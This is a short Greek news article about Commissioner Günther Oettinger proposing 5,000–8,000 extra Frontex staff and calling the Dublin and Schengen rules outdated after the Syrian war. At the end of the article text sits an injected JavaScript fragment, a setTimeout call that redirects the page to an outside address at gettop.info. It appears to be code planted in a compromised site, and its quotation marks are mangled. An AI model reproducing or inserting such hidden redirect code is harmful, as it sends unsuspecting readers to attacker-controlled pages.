Έτινγκερ: Ενίσχυση της Frontex με 5.000 – 8.000 υπαλλήλους

0
4

 

Την ενίσχυση της Frontex με 5.000-8.000 υπαλλήλους προαναγγέλλει ο Επίτροπος Γκίντερ Έτινγκερ ο οποίος επικροτεί το κλείσιμο του βαλκανικού διαδρόμου και τη συνεχιζόμενη αναστολή της συνθήκης του Σένγκεν στις χώρες οι οποίες συμμετέχουν, μιλώντας στην εφημερίδα Rheinische Post.

«Η Ευρώπη αντλεί τα σωστά διδάγματα από τις εμπειρίες των τελευταίων χρόνων», δήλωσε ο Επίτροπος ο οποίος προσέθεσε πως οι κανόνες του Δουβλίνου και του Σένγκεν ήταν «κανόνες για μια κανονική γειτονία», όταν δηλαδή ακόμα ο αριθμός των αιτήσεων ασύλου ανερχόταν συνολικά σε μερικές δεκάδες χιλιάδες σε όλη την Ευρώπη .»Λόγω του πολέμου στη Συρία η κατάσταση όμως στην Ευρωπαϊκή Ένωση έχει αλλάξει. Γι’ αυτό ήταν απλώς φυσική συνέπεια να αποχαιρετίσει η Ευρώπη το Δουβλίνο και το Σένγκεν«.

Η κουλτούρα της φιλοξενίας όμως κατά βάση δεν τελείωσε, πρόσθεσε ο Γερμανός Επίτροπος: «Θα εξακολουθήσουμε να δεχόμαστε πρόσφυγες από χώρες όπου γίνεται εμφύλιος πόλεμος, αλλά ο στόχος μας πρέπει να είναι να μην φτάσει ο αριθμός τους στα περυσινά μεγέθη». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here